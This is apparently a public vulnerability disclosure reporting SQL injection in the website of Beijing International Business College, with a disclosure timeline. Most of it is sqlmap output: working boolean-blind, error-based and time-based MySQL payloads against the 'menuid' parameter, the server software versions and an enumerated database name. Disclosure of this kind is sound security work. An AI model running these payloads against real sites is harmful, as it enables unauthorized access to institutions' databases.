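2016-01-12: Details reported to the vendor; awaiting vendor response
2016-01-17: Vendor actively ignored the vulnerability; details disclosed to the public
SQL injection at Beijing International Business College (北京国际商务学院)
Injection point: http://**.**.**.**/ibub/liuxue/?menuid=13&mainid=1&elsetype=6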
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: menuid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: menuid=13 RLIKE (SELECT (CASE WHEN (3689=3689) THEN 13 ELSE 0x28 END))&mainid=1&elsetype=6

    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: menuid=13 PROCEDURE ANALYSE(EXTRACTVALUE(8869,CONCAT(0x5c,0x717a6a7871,(SELECT (CASE WHEN (8869=8869) THEN 1 ELSE 0 END)),0x717a767871)),1)&mainid=1&elsetype=6

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: menuid=13 AND SLEEP(5)&mainid=1&elsetype=6
---
web application technology: Apache 2.2.9, PHP 5.2.14
back-end DBMS: MySQL 5.1
available databases [1]:
[*] ibub_cc_fuckdb
Severity: no impact, ignored by vendor
Ignored at: 2016-01-17 22:34
None yet